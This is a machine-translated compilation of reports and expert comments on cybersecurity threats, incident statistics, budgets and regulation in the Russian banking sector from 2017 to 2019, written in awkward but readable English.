Despite the general growth of number of the attacks in 2018, the financial damage considerably decreased in comparison with previous year. It is promoted in many respects by information exchange in the industry, in particular start of the automated system of processing of incidents (ASPI) of FINTSERT. According to these FINTSERT, the damage of the Russian organizations of the credit and financial sphere from the attacks of the Cobalt group in 2018 was not less than 44 million rubles, and from the attacks of the Silence group — not less than 14.4 million rubles. In total in a year FINTSERT received data on 590 attacks to the credit and financial organizations, including on 177 target attacks.

In spite of the fact that the information exchange system of FINTSERT allowed to lower the amounts of losses of banks, the danger of the target attacks is still high. APT groupings constantly improve technology of the attacks, improve quality of mailings, monitor the publication of vulnerabilities, purchase vulnerabilities of zero day and enter them into the arsenal in only a few hours. The credit and financial organizations cannot regard more as of paramount importance traditional construction of protective barriers. The situation changed: criminals learned to bypass antiviruses, sandboxes, the IDS systems. Banks should recognize that the hypothetical malefactor already is in their perimeter; the main task — as much as possible to reduce time of its presence at IT infrastructure and to deprive of it an opportunity to work,

Qrator Labs: More than 55% of banks noted increase in the cybersecurity budget since 2016

On March 5, 2019 the company Qrator Labs specializing in counteraction DDoS-to the attacks and ensuring availability internet- resources, provided results of a research information security in financial sector in 2018. Poll was organized among banks and payment systems, working century Russia. Selection includes banks from TOP rating 200 by the amount of assets.

Qrator Labs noted that the number of cyber attacks continues to grow in banking sector as it is global, and in Russia, at the same time the attacks become technically harder and harder. The largest players of the industry state growth of number of attempts of incidents by 1.5-2 times concerning indicators for the same period of 2017. Understanding of scale of a problem and risks stimulates increase in investments of most banks into security systems.

55.3% of the respondents participating in a research for two years noted increase in the cybersecurity budget since 2016. Also 35.3% of respondents increased the budget in 2017, and 10.6% of respondents adapted the cybersecurity budget to the growing threats continuously for two years (2016-2018).

More than a half of respondents note among the most substantial effects from cybersecurity incidents finance costs, about a half more – reputation. Increase in risk of revocation of license is fixed by a third of respondents (the previous year - about a quarter).

Reaction of financial institutions to the European regulation about data protection attracts attention. About a quarter of the polled banks note that for 2018 the systems already brought into accord with requirements of GDPR (General Data Protection Regulation), and about a thirds more are going to implement this task in the next year.

"Considering that requirement of GDPR is imposed not by the Russian legislation, i.e. does not mean imposition of sanctions and revocation of license of the Central Bank, that fact that already a quarter of banking systems meets standards of the European regulation, speaks about high prioritization by banks of work with clients with the European passports. The most important – we see that banks continue to treat seriously legislatively ordered security in any its kind".

Stimulates their protection level, insufficient against the background of the growing threats, to replacement of earlier implemented means of cybersecurity that confirm pentests or already recorded incidents (62% of respondents, 53% - the previous year). 31% see such need for a situation of transition to other infrastructures (clouds and so forth) where the used solutions stop being effective (more than a quarter – the previous year).

When approaching to the choice of the solution WAF (web application firewall) of 68% of respondents are guided by the solution of really arising technology tasks: from protection against zero day attacks before control of security of often updated code. At the same time for a third of respondents a key factor — formal compliance to requirements of the PCI DSS standard.

More than a half of respondents of the financial sector note that for 2018 the level of threats of DDoS grew (the similar result was fixed and the previous year). According to about a quarter more of respondents, the number of the attacks remained for the same period invariable (more than a third – the previous year).

More than a half of respondents also indicate that they faced DDoS attacks for the last year (last year like those there were 26%). In addition to DDoS, the most often polled companies from the financial sector face still a phishing (46%). More than a third claim that they avoided cybersecurity incidents for the last year.

"Among the reasons which could provoke similar growth it is possible to call sharp falling of rates of all cryptocurrencies. DDoS attacks remain one of the simplest methods of monetization of the malware, whether it be the infected servers or botnets based on personal computers and phones. In 2017 malefactors had an opportunity with a certain benefit for themselves to use botnets and the cracked servers for cryptocurrency mining. As you know, the main costs from mining is the electric power and if access to the computer is got in an illegitimate way, then the malefactor should not pay for energy, and he receives cryptocurrency "from air" regardless of its volumes. In 2018 not only in connection with falling of exchange rates, but also categorical instability of a rate of cryptocurrencies for malefactors a certain attractiveness was found again by "good old" methods of earning on botnets: carrying out the attacks for the purpose of racketing".

Artem Gavrichenkov, technical director of Qrator Labs

Most of respondents (65%) consider the most effective remedy of counteraction of DDoS hybrid solutions (on client side with participation of the operator solution, or a distributed network).

As noted in Qrator Labs, growth of number of the banks attracting external solutions for protection against the attacks it is also in many respects connected with the increased level of threats for 2018 and growth of number of high-speed DDoS attacks using technology of amplification on the basis of memcache, LDAP amplification, the attacks using the CoAP protocol (Constrained Application Protocol) and so forth.

Group-IB: more than 70% of banks are not ready to resist to cyber attacks

On February 19, 2019 Group-IB, the international company, specializing in prevention of cyber attacks, analyzed hi-tech crimes of 2018 her experts-cybercriminalists were involved in response to which. According to a research, the bulk of the hacker attacks traditionally fell on the financial sector, at the same time 74% of banks were not ready to cyber attacks, active infections with malware were detected in 29%, and in 52% of cases traces of commission of the attacks in the past are revealed. Among dangerous trends of 2018 — the cross-border attacks starting "chain reaction" that leads to multiple infections of financial institutions. In 2018 the command of reaction Group-IB fixed use of this vector both in Russia, and in Eastern Europe.

The total quantity of reactions (Incident Response) of Laboratory of computer criminalistics Group-IB grew more than twice relatively 2017. The main threats which the affected companies faced head the target attacks, competitive espionage, the attacks using viruses encoders, cryptomining. The main output of forensic experts of Group-IB – the vast majority of the Russian companies which became the victims of the hacker attacks in 2018 had no plan of response to a cyberincident, were not ready to mobilize work of operating units in a short time and are not capable to resist organizationally and technically to actions of attacking. Experts of Group-IB pay attention to a high probability of repeated incidents in such companies.

Risk group: banks are not ready to reflect cyber attack

According to the research Group-IB, about 70% of hacker activity in 2018 were the share of banks. Schemes for cashing in of money by hackers remained the same: through in advance opened "under obnat" bank cards, accounts of legal phony companies, payment systems, ATMs and SIM cards. At the same time cashing in speed in Russia grew several times: if 3 years ago the output of the amount of 200 million rubles, on average, took about 25-30 hours, then in the 2018th year the company faced a precedent when the same amount was cashed less than in 15 minutes once, in the different cities of Russia.

Analyzing the data obtained within responses to cyberincidents experts came to a conclusion that 74% of the banks attacked in 2018 were not ready to the hacker attacks: more than 60% are not capable to manage on a centralized basis the network, especially, in geographically distributed infrastructure, about 80% have no sufficient depth of journalizing of events more than a month long, more than 65% spent for approval of works between divisions more than 4 hours. At the same time the average number of hours, spent for meetings, approvals of accesses, scheduled works within one reaction at approach of an incident made 12 hours.

Chain reaction

The research Group-IB reveals not only inconsistency in work of internal divisions and weak study of the organizational procedures necessary for establishment of a source of infection, scale of a compromise and localization of an incident, but also insufficient technical training of bank staff. According to the company, profile skills on search of signs of infection and unauthorized activity in network are absent or are insufficient at personnel of 70% of the organizations. As much have no accurate procedures for independent identification of a compromise hardware and the software. High risks are born by unavailability of technical specialists to quick reaction on an incident: more than 60% of affected banks are not capable to carry out the centralized one-time change of all passwords to a short time that allows hackers to attack new targets from within the cracked infrastructure of bank.

Bank, whose infrastructure it was cracked, can not just lose money, but also to become threat for other players of financial market. Attacking a target, financially motivated hacker group aims to gain maximum benefit: receiving control over the systems of bank, she is interested not only in withdrawal of money from it, but also in infection of the maximum number of the victims. For this purpose "domino effect" is started — harmful mailing from the compromised infrastructure goes according to lists of the partner companies of bank. Such vector is dangerous, first of all that letters go from real bank, i.e. the sender is not forged that increases the probability of their opening in partner bank. Thus chain reaction which can lead to multiple infections of financial institutions is started. In 2018 we recorded use of this vector both in Russia, and in Eastern Europe.
Valery Baulin, head of Laboratory of computer criminalistics of Group-IB company

"Double bottom" of cyber attack

According to Group-IB, not less than 17% of the companies to whom reaction was carried out underwent repeated operation of earlier not eliminated vulnerabilities within a year after the last infection. In most cases it turned out to be consequence of non-execution of recommendations about elimination of effects of a cyberincident and also negligence from bank staff. Besides, during 2018 active infections about which existence the internal Information Security Service did not suspect earlier were detected in 29% of the organizations of the financial sector by experts of Group-IB. In 52% of cases traces of commission of the attacks in the past are detected.

In the 2018th year the command of reaction Group-IB records cases when a cyberincident led to creation of sharply negative background around bank that provoked the information attack, reputation losses, and in some cases – leaving from the market.

Around bank intentionally or already upon the negative background is created: estimates of potential damage, unacceptably low level of protection, probable revocation of license. It leads to outflow of clients and partners, the bank faces insufficient capitalization. Cyber attack use, as instrument of drawing a loss of reputation and replacement of the competitor from the market, one more dangerous vector which can potentially gain further development as the level of cyber security of small banks still remains extremely low.
Valery Baulin, head of Laboratory of computer criminalistics of Group-IB company

Situation on information security market of banks in 2018

Business process automation in banking sector was beyond application of standard, usual solutions for banks, such as the core banking system or RBS – systems for automation of banking activities or remote customer service. Trust information technologies more and more tasks of optimization of atypical processes using new mathematical models and algorithms - it is also control automation by different types of risks, claim and claim work, the solution for fight against frauds, etc.

When implementing the strategy of digital transformation the hi-tech bank becomes much more vulnerable to cyberthreats, Dmitry Livshits, the CEO considers Digital Design. Therefore not only cost reduction on operating activities due to acceleration of internal processes or providing new services to clients becomes the purpose of automation.

The information security comes out on top, and, I believe, in the next two years it is the direction will keep superiority among trends of bank informatization, - he notes.

Maxim Bolyshev, the associate director of department of banking software of RS-Bank of R-Style Softlab company, says that now the banking sector is under close attention of the Central Bank in connection with the become frequent cyber attacks which objects are not only clients of banks, but also banks. With respect thereto the Bank of Russia develops requirements to cyber security (for example, 382-P or 552-P) and insists on their accomplishment. The Central Bank will organize participation of information exchange of banks with FINTSERT for collective fight against cyberthreats.

Vladimir Volkov, the senior vice president of Technoserv company, considers that the financial sector is a legislator of a fashion in information security, a reference point for all other market. Banks are the tidbit for cybercriminals of different extent of preparation and an opportunity to quickly monetize the skills and abilities.

A large number of regulatory requirements in information security field, from traditional international PCI DSS and SOX, to the new mandatory requirements issued for the last year is applied to the banking sector from the Central Bank of the Russian Federation and Swift in information security field. I will remind that at first began the work with FINTSERT and only now all other industries begin to be connected to the state system of counteraction to the computer attacks of GOSSOPKA. Sberbank builds, perhaps, the largest corporate Security Operations Center (SOC) in the world, - fight against cyber crime is conducted daily as malefactors constantly find new methods of the attacks to banks, - Vladimir Volkov tells.

One more key segment for banks is ensuring so-called "real" security.

Understanding of problems by banks in protection of the information systems, existence of logical holes is preserving not only means of bank, but also its reputation. Technoserv can offer banks protection against cyberthreats, including such technologies as "sandboxes", protection against the target attacks, creation of SOC with a special emphasis on study of methodology, processes (for example, responses to incidents, managements of vulnerabilities), - he adds.

In banks there is an interesting situation: on the one hand, it is necessary to bring promptly to the market new online products and to constantly change IT infrastructure not to lag behind the market; with another – to provide the high level of security. The main call for cybersecurity services in finding and keeping this balance.

The widespread solution of this problem – formation of the IB standard services which it is convenient to IT to use also to business and also strong involvement in questions cybersecurity of these blocks, - Vadim Shustov, the deputy CEO of Jet Infosystems company considers.

According to him, in terms of regulation in the field of cybersecurity, in Russia pressure upon the financial sector one of the strongest, but also the regulator, obviously, the most advanced in this area.

Its requirements not mere formality – they are really dictated by sad examples of the cracked banks. As a result of the requirement become tougher every year and their accomplishment, especially for small financial credit institutions, becomes more and more monumental task, - Shustov believes.

Anatoly Naboka, the director of work with corporate customers of System Software company, considers that in terms of security EDR solutions — systems of detection of incidents in workplaces with a possibility of rapid response to them are of the greatest interest now. In this segment in the Russian market new interesting players appear: for example, now the market is entered by the predictive cybersecurity Carbon Black systems integrating in themselves functionality of EDR, an antivirus, system of the managed search and sorting of threats and also solutions for security at the level of data center.

Banks are interested in such tools as in them pro-active approach is applied: EDR collect and analyze large volumes of data and help to prevent new, earlier unused malefactors types of the attacks. It means the cyber defense level providing obvious competitive advantage for financial institution, - Anatoly Naboka notes.

Russians were given large terms for theft of money from Internet banks

In Moscow consideration of the case about gang of cybercriminals who cracked personal accounts of citizens in banks then displaid different amounts of money[9] from there ended [10].

In total it is about 30 episodes which fall under several articles of the criminal code: creation, use and distribution of harmful computer programs, illegal access to computer information, fraud in the field of computer information. The group consisted of two leaders and four of their accomplices, all of them received different terms.

"Brothers Dmitry and Evgeny Popelyshi are sentenced to punishment in the form of eight years of colony with a penalty of 900 thousand rubles everyone, three more received punishment from four and a half to six years of colony with penalties to 700 thousand rubles. They will serve sentence in standard regime penal colony. One more defendant was sentenced to three years conditionally, but amnestied", - the press secretary of Savelovsky Court Maria Mikhaylova told.

Problems of information security of banks

In the Russian banking sector growth of level of information security is noted. In connections with emergence of a large number of cyberthreats, the organizations of the financial sphere pass from "paper" security to real echelon approach which is based on risks assessment. So for 2017 the number of cybersecurity incidents in the financial sphere grew more than twice in comparison with previous year. The attacks happen both on clients — physical persons and legal entities, and on banks and payment systems.

Low level of culture of cybersecurity

The high share of the successful attacks is connected first of all with the low level of culture of information security both among clients, and among bank employees.

The neglect to the basic rules of cyberhygiene involves risks, for example, of social engineering — the instrument of cyberfraud which can also serve as the beginning of large-scale cyber attack, - Maria Voronova, the head of consulting of InfoWatch Group explains.

The solution of the sounded problem, according to her, is promoted by high-quality regulation of questions of information security of the industry — since January 1, 2018 became effective new GOST on data protection of financial institutions. The standard offers complex approach to planning, implementation, control and improvement of process of data protection in financial institutions.

Andrey Gridin, the head of department of solutions of information security of the company "The swagger is Development center" (FORS Group), considers that it is necessary to inform employees on importance of security, to instruct on fundamentals of cybersecurity with reduction of examples from practice, to impose the personal liability of each employee, and if necessary to attract administrative resources.

Also Sergey Sherstobitov, the CEO of Angara Technologies Group holds the similar opinion. According to him, loss of confidential data is, as a rule, connected not with "holes" in IT systems or imperfection of technical means of protection, and with a human factor therefore special attention should be paid to personnel training in information security field and to increase in awareness in cybersecurity.

Anton Golovaty, the director of business development LANIT-Integration, adds that it more and more our data is at financial institutions. At the same time, with growth of number of joint platforms the number of the personalized data from banks and their partners will only grow, and information will be even more detailed. Therefore the question of protection of the personalized data in the future will be even more relevant, he is sure.

Alexey Trefilov, the director of ELMA, speaks about danger which traps clients.

Convenient bank services of steel for all usual. Paradoxically, but the convenience and availability of banking services, do us by more thoughtless. If all around constantly use phone for payment of services and obtaining information on the account status, then and it seems to us absolutely safe. Therefore very just to lose vigilance and, for example, accidentally to permit some game to read your SMS including from bank in phone, - he explains.

Phishing and DDoS attacks

According to the research Qrator Labs, most often the companies from the financial sector face a phishing (30%) and DDoS attacks (26%). Read more here.

Weak interaction of specialists of cybersecurity and IT

As a rule, at creation new or upgrades of the existing systems specialists in cybersecurity do not participate in design process but only they "coordinate the documentation", and data protection is limited to placement of the equipment in the protected segment, ensuring network access and differentiation of user rights, and after input of a system on it information security tools "are hung". As a result problems with performance begin, Andrey Gridin, the head of department of solutions of information security of Fors-Centre razrabotki (FORS Group) company tells.

According to him, for solution requirements to integration/interaction with cybersecurity system components should be accurately formulated. It is necessary to carry out regular instructing of specialists of IT in application/implementation of these requirements. Also obligatory inclusion of the specialist in cybersecurity in a project team at a design stage or upgrade of a system should be regulated.

Protection of mobile jobs

According to experts, it is already not enough to ensure safety at the level of mobile application. When the personal device becomes a full-fledged workplace of employees, wider is necessary, but not less reliable method of data protection.

Dmitry Livshits, the CEO Digital Design, tells that his company developed the solution which allows to submerge any corporate application of the customer on the protected Wednesday, the so-called protected container for elimination of this problem. In it is mute it is possible to work with any application on the personal device, without worrying that information will flow away in out of.

Integration of the application into "container" is implemented by "wrapping" – automatic substitution of the standard libraries of work with files, the local database and network used in the application on their encoded analogs, - he explains.

Security mobile and Internet banks

Maxim Nikitin, the vice president of Maykor, the CEO of BTE (BTE), notes that in banking sector relevance of a problem in the field of security mobile and Internet banks in the investigation of insufficient level of data encryption and a possibility of start of mobile application in public Internet networks where the probability of interception of traffic is high still do not lose.

The solution lies on a surface and consists in development and deployment of the improved encryption systems and applications testing on a possibility of the attacks in the public place, - he explains.

Not certified information security tools

Banks faced that for processing of huge data arrays which grow daily they cannot increase resources also infinitely. It makes sense to transfer a part of data to clouds where not only the centralized resources concentrated in DPC, but also final workstations direct at least.

Therefore the relevance of transition to clouds grows, but with accomplishment of standards of the Bank of Russia and other regulating documents regarding fulfillment of requirements on data protection, Mikhail Golovachev, the CEO notes Amtel-Service. At the same time, the problem, according to him, consists that many modern means of cybersecurity are not certified on compliance to requirements for data protection.

Big finance of cyber crime

Cyber crime – huge, well organized business which annually operates with billions of dollars worldwide. Not always protect antivirus software or technologies of data protection because technologies of hackers are also constantly improved, as well as security tools from cyber attacks.

The main problem is that financing of cyber crime 10 times more financing of the companies which fight against it. As a result, continuation of building of opportunities at IT criminals, and the escalating need for new technologies of IT security. In general, employees of information security still long time will be a valuable personnel for credit institutions, - Alexey Kolesnikov, the sales director of iSimpleLab notes.

Yury Goltser, the technical director of the department of CRM of Navicon company, adds that mechanisms of data protection of clients are constantly improved, including the latest encryption algorithms are developed.

In 2017 testings of instruments of quantum enciphering began: The Russian Quantum Center (RQC) started the Russia's first communication line with quantum protection between two offices of Sberbank. Now experiments in a scope of quantum computers for data security provision are watched closely by developers a blockchain projects. Besides, banks see perspectives of protection against cyber crime in creation of universal mechanisms of joint work with the governments and law enforcement agencies. According to market participants to make the markets, tools and systems cybercriminals inefficient, it is necessary to adjust, first of all, communication between banking systems of the different countries, - the representative of Navicon says.

He also reminds that at the beginning of a year the American banks and online creditery Citigroup, Kabbage, Depository Trust & Clearing Corporation, Hewlett Packard and the Swiss Zurich Insurance Group announced creation of consortium on cyber security in the field of a fintekh – the World Economic Forum will manage it.

We see similar initiatives worldwide. For example, the British offices Lloyds joins Barclays, Deutsche Bank, Santander UK and Standard Chartered integrated in Alliance on cyber defense (Cyber Defence Alliance). The tendency to consolidation against a common threat will only grow, - Yury Goltser is sure.

The Ministry of Justice obliged banks to book pentests and audit of cyber security

Banks will oblige to observe new measures of cyber security among which are obligatory an information security audit, different testings for penetration (pentests), obligatory certification of the used program equipment. The document was signed in the summer of 2018 by the Ministry of Justice of the Russian Federation. By itself, compliance to these requirements will lay down a financial load not only on shoulders of banks, but also and on shoulders of their clients. Thus, amendments in provision of the Central Bank 382-P at last took a complete form and were registered by Ministry of Justice. On June 26, two days ago, the Central Bank sent to banks this document. Now credit institutions should use the software certified by FSTEC.

Specialists consider that in certain cases banks do not pay to certification due attention that leads to the subsequent detection of vulnerabilities in programs. Only those financial institutions in which state there are strong cybersecurity specialists are able to afford the analysis of security. Pentests now, according to the document, will be annually carried out, and every two years credit institutions should perform external audit of cyber security. The main concern in this situation — growth of expenses. The Central Bank considers that expenses will not be excessive.

Banks of the Russian Federation had an opportunity to block operations on money withdrawal through the RBS systems

State Duma The Russian Federation approved on June 5, 2018 in the third reading the government bill directed to counteraction to plunder of money at performing transactions using systems remote banking (RBS).

The document sets an operations procedure of banks at identification of signs of illegitimate transactions — i.e., the money transfers made without permission and the consent of the account holder. The duty to suspend execution of the order for the term of no more than two working days and also to block the electronic payment instrument for the same term is assigned to bank or the operator on money transfer if signs of commission of money transfer without the consent of the client are detected.

These signs are defined by the Central Bank of Russian Federation. Along with it, the bank is offered to grant the right to make similar actions at identification of additional signs of commission of money transfer without the consent of the payer — their banks will have the right to set independently according to requirements of the Central Bank.

After suspension of money transfer and blocking of the electronic payment instrument the bank will be obliged to request without delay from the client confirmation on a possibility of execution of the payment order (resuming of use of the electronic payment instrument). When receiving confirmation of the client the bank will be obliged to perform the order (to resume use of the electronic payment instrument) without delay, at non receipt — to make similar actions after two working days.

Besides, the special operations procedure of bank, the money aimed at return to the legal owner in case of implementation of unauthorized write-off from a customer account is entered. The specified order is intended only for protection of legal entities: for individuals the procedure of return of means was fixed by earlier law.

The bill fixes powers of the Central Bank on formation and database maintenance about cases of commission of money transfer without the consent of the client and to determination of an order of the direction and receiving by operators on money transfer, operators of payment systems and operators of payment infrastructure of information from the specified database.

The banking system around the world incurs enormous losses because of actions of the cyberswindlers stealing funds from accounts of natural persons and the organizations — Dmitry Gvozdev, the CEO of Information Technologies of the Future company noted. — Malefactors constantly improve the tools used for plunders, however illegitimate transactions always have certain indicators on which they can be identified. The offered bill regulates procedures which need to be undertaken if there is a suspicious transaction. A question so far only in that, lists of signs of such transactions — at the level of the Central Bank and separate banks will be how competently made.

The document will become effective after 90 days after day of its official publication; apparently, fall of 2018 he will already act.[11]

The ECB will attract hackers to check of cyber security of the financial sector

The European Central Bank (ECB) announced in May, 2018 start of the check program on cyber security of a banking system. According to Kommersant with reference to the statement of bank, systems will test salaried employees and also  specially employed teams of hackers who will try to detect defects for durability, modeling real attempts of cracking.

The corresponding project is called "The European program for reflection of threats using the special experts attacking a system from the outside" (European Framework for Threat Intelligence-based Ethical Red Teaming — TIBER-EU). The program has advisory nature — in the ECB emphasize that EU Member States can decide when and how to carry out inspections of the financial institutions.

During tests it is offered to use "a full range of methods which are used by real hackers". In particular, the ECB suggests to subject to conditional cyber attacks the crucial systems of financial institutions.

According to the results of  checks  recommendations about improvement of a specific security system of this or that financial institution will be made, specified in the ECB. At the same time in explanations to the TIBER-EU program it is said that "the authorities will recognize passing of tests only if not only internal specialists, but also outer sides participate in them".

Positive Technologies: web applications of banks are most vulnerable

Specialists of Positive Technologies prepared statistics on vulnerabilities of web applications which were investigated within works on the automated analysis of security using PT Application Inspector in 2017.

Based on the automated analysis of the source code it was established that all web applications have vulnerabilities, and only in 6% of the studied systems there are no vulnerabilities of a high risk.

As one would expect, the financial sector is subject to the greatest risk (its share makes 46% of a total quantity of the studied web applications). Vulnerabilities of a high risk were found in all applications of banks and other financial institutions.

The financial and also state organizations, experts of Positive Technologies note, are most interested in the analysis of the source code as their web resources are the priority purposes for malefactors that is confirmed by regular analytical reports of the company.

The automated analysis of security using PT AI showed that all tested web applications contain vulnerabilities of a different risk degree. At classification of vulnerabilities by a risk degree it was established that their most part (65%) belongs to the average level of danger, 27% — to high.

The most widespread vulnerability revealed in the automated analysis of the source code of applications is "Cross-site accomplishment of scenarios" using which the malefactor can carry out phishing attacks on clients of the web application or infect their workstations with the malicious software (meets in 82% of the tested systems).

On the basis of the analysis of effects from operation of the vulnerabilities revealed in web applications specialists of Positive Technologies made the rating of security risks. The most widespread threat is a possibility of carrying out the attacks on users of the web application (87% of banks and one and all public institutions are subject to it).

As emphasized in Positive Technologies, most of users of such web resources are very badly informed in questions of information security and can easily become the victims of malefactors. Besides, among web resources of state institutions also other critically dangerous vulnerabilities are widespread. For example, at a research of the web application of administration of one of municipal entities vulnerability of a high risk "Implementation of the SQL code" using which operation it is possible to obtain sensitive information from the database was detected.

The vulnerabilities which are carrying out to failure in service represent the greatest problem for online stores as failure in work of the web application for the organization which is engaged in electronic trading is directly connected with financial losses. Besides, the more popular online store, the more clients visit it every day and the more probably that the malefactor will try to use vulnerabilities of this web resource for attacks on its users.

Web applications are one of the main targets for malefactors because the large number of uncorrected vulnerabilities and simplicity of their operation help attacking successfully to achieve the goals — from theft of sensitive information before access to internal resources of a local computer network — Anastasia Grishina, the analyst of Positive Technologies noted. — It is important to understand that the majority of vulnerabilities can be revealed long before the attack, and the analysis of the source code of web applications allows to detect several times more critically dangerous vulnerabilities, than testing of systems without code research.

FinCERT: the main facts about financial fraud in Russia

As it became known in February, 2018, FinCERT of the Central Bank issued the overview of fraudulent financial transactions in Russia for 2017.

The first successful attack through SWIFT

According to the overview, in 2017 hackers for the first time managed to attack successfully the Russian bank via the SWIFT system and to steal at the same time 339.5 million rubles. According to Vedomosti and Kommersant, the Globex bank fell a victim of the attack. The president of financial institution Valery Ovsyannikov confirmed that "there was an attack attempt", but noted that means of clients did not suffer. The bank opened the amount of plunder at the end of December, 2017: hackers could display about $1 million, but the most part of means managed to be blocked and returned.

In general, according to experts, use of SWIFT channel is unusual to Russia. As a rule, hackers use for withdrawal of funds of the card. In world practice this system is used much more often.

Fraud with accounts of legal persons

In 2017 from accounts of the companies tried to steal means of 841 times. At the same time the volume of such transactions for 2017 decreased by 17.4% to 1.57 billion rubles. Slightly more than a half of this amount was succeeded to return.

The amounts from 100 thousand to 1 million rubles are of the greatest interest to swindlers. A half of fraudulent transactions with accounts of the companies are the share of this segment. A little more than a third — on a segment from one to ten million.

The most popular method of stealing of money is implementation of a malicious code as transactions in the majority are made from desktop computers.

Attacks on cards

According to data of the FinCERT overview, the average amount of fraud with cards in 2017 in Russia was 3 thousand rubles. This indicator decreased, as well as the volume of transactions of malefactors with the cards issued in Russia which in 2017 made about 1 billion rubles.

Slightly less than a half of operations with the Russian bank cards takes place outside Russia. At the same time the absolute leader in quantity and volume of fraudulent transactions with use of bank cards in Russia — Moscow, said in the overview.

More and more active development of cryptocurrencies and as result, switching of attention of swindlers to them could become a possible explanation of decrease in interest in plunders with bank cards, according to experts. However such trend can be short. Legislative regulation of the market of cryptocurrencies can lead to growth of fraudulent transactions, believe in FinCERT[12].

Legislative regulation of the corresponding market (cryptocurrencies — a comment of TAdviser) can reduce its attractiveness for malefactors that, perhaps, will cause increase in their activity in the field of remote payment services and, as a result, increase in quantity and volume of unauthorized transactions, said in the overview.

As it appeared, many Russians and the companies prefer not to address to law enforcement agencies in case of fraud with their bank card. So, in a case from 97% of unauthorized transactions with use of cards or it is precisely known that the appeal to pravokhranitelny bodies was not, or about such address there are no data. Only 20% of the legal persons facing fraud addressed to law enforcement agencies.

Attacks on ATMs and terminals

Statistically, the interest of swindlers in them decreases. So, the volume of illegal transactions with them was reduced by a third to 230.7 million rubles. And the damage from actions of swindlers was 42 million rubles.

According to FinCERT, several methods of cracking of ATMs are generally used: connection to devices of the devices allowing to manage them, remote control after infection with a virus and physical impact on them (for example, explosion).

The attention of malefactors switched to CNP transactions (engl. Card not present transaction) at which the card holder can physically not be present in time and at the venue of payment. The volume of the last it is insignificant (approximately for 1.5%), but grew, having made 726.4 million rubles.


Research of TAdviser and VMware

The VMware company provided results of the research of the largest financial institutions conducted together with analytical center TAdviser in December, 2017. According to the report, it is more than a half (52%) of banks and insurance companies of Russia and the CIS increased the budget by information security in 2016-17 in connection with growth of cyberthreats and activities harmful the programmissledovaniye [13]

The research once again confirmed that for the last year the number of threats of information security for the corporate sector grew considerably — it is confirmed by 80% of the polled financial institutions. Only 16% recorded preserving of the previous level of cyber crime. Reputation and financial losses (including, a lost profit) are the most critical effects from cybersecurity incidents in financial institutions, consider about 50% of respondents. Therefore in the conditions of growth of cyberthreats more than a half (52%) of the companies increased the budget by means of protecting.

Nearly a third of respondents (28%) are also afraid of measures from regulators (for example, revocation of licenses) as a result of the successful attack or date leak. However whatever were effects anybody has no doubts that they are inevitable.

Banks actively offer the clients an online interaction opportunity, for example, through an online bankning and mobile applications. Therefore it is no wonder that among the most widespread threats of the financial sector to the company DDoS attacks (28%) noted. Unavailability mobile or online bank even within several hours can spoil considerably reputation of bank or lead to real financial loss. Among other threats respondents noted a phishing (26%) and the attacks of encoders (10%).

Digital transformation of banking business also means transfer of calculations to a cloud. For example, according to [14], in the USA 81% of respondents from banks with assets in 100 billion dollars and more and 68% of banks with assets from 15 to 100 billion dollars master cloud computing now. However financial companies in Russia have serious concerns in connection with cloud model. So, more than two thirds (70%) consider I will lose or data theft by the main risks at migration in a cloud environment. With a big separation respondents noted idle times because of provider (26%).

Use of mobile devices for the solution of working tasks becomes regulation and for bank employees. However more than a half of financial institutions (53%) do not use any solutions on mobile device management MDMEMM (/) that as a result can bring to to leak of corporate data.

The danger to business consists that the quantity and scale of the attacks grows not just — even more often malefactors use the unknown malware. These are malwares which the traditional antivirus because there are no data on them in cybersecurity bases of the companies yet cannot trace. The effective response to this new threat is the model of "zero trust" which became possible thanks to software-defined networks (Software-Defined Networks, SDN) — it is implemented in the solution VMware NSX. According to poll, a half of banks (50%) and insurance companies are guided by model of "zero trust" at creation of the cybersecurity systems, however only 4% of respondents already unrolled software-defined networks. Fortunately, nearly a half of the organizations (40%) confirm the plans of use of SDN.

"In modern digital economy data are capital asset of banks and insurance companies. Their leak or unauthorized access to them can lead to critical effects for all organization. SDN technologies (program and certain networks) are designed to help our customers to answer these calls in information security field — Alexander Vasilenko, the chief representative of VMware company in Russia and the CIS says. — The strategy of information security of VMware together with partner solutions allows to provide the built-in protection at all levels of networks, clouds and end devices. For example, thanks to technology of microsegmentation VMware NSX in case of cracking of one network segment it is possible to stop distribution of epidemic on other segments. This approach allows to minimize significantly damage even if malefactors already managed to get into your network".

In Google Play a boom of the Trojans masking under mobile applications of banks

Group-IB at the end of November, 2017 noted a wave of mass distribution of the Trojans masking under mobile applications of the leading banks of the country. Specialists of Group-IB block resources from which there is a distribution of these applications, but their volume constantly grows.

The trojans intended for mobile devices under management OS Android extend not through official shop Google Play, and through advertisements in search systems. At the same time experts of Group-IB noted high quality of programs counterfeits that confuses many users who are not paying attention to suspicious "trifles". In more detail here.

Research Qrator Labs and Valarm

Works within this research were carried out in a format of field poll. Respondents were offered to answer questions of the questionnaire. Poll was organized among banks and payment systems working in Russia. Selection includes banks from TOP rating 200 by the amount of assets.

The budget on cybersecurity

The industry of information security naturally continues to grow. According to the conducted survey, more than a third (32%) of respondents from the financial industry confirmed increase in the cybersecurity budget in 2016, and another 39% noted preserving of investments into security in former amount.

It is noticeable that growth of cybersecurity budgets becomes directly connected with a practical component: financial institutions plan increase in expenses on security, having appeared in the face of real threat. It is remarkable for two reasons: while formal compliance to requirements of regulators stops being a main growth driver, nevertheless, pro-active tactics of protection and planning of cybersecurity architecture on the basis of, at least, testing for penetration (or pentest) still such driver is not.

13% of respondents reported that the budget on cybersecurity in their organizations in 2016 decreased a little. At the same time respondents in general note lack of communication between decrease in the budget and actual level of threats – the reasons of decrease in cybersecurity budgets generally lie in other plane and do not depend on a status and calls of discipline of cybersecurity. In fact, the task of expense optimization during the preserving and even increase in required level of security from external adverse conditions was set for a noticeable part of Cybersecurity Departments in 2016 though in general on the industry the tendency to growth of budgets at the moment remains.

Replacement of the used means of protecting

The protection methods implemented earlier provide the insufficient security level today: threats in already existing directions grew, also new risks appeared.

In most cases the main incentive for updating of infrastructure of cybersecurity is an external activity: the incidents connected with demonstration of insufficient protection and problems which are organized or "black hats" – hackers, or "white" – testers. More than a quarter of respondents see for themselves need for replacement of the used means of protecting upon transition to new infrastructures (clouds, microservices and so forth) where the used solutions stop being effective.

A noticeable role at making decision on updating of the used means of protecting is played by a question of origin of the bought products: about 13% of respondents answered that they first of all are inclined to replace import solutions with the Russian analogs.

Acquisition of the solution WAF

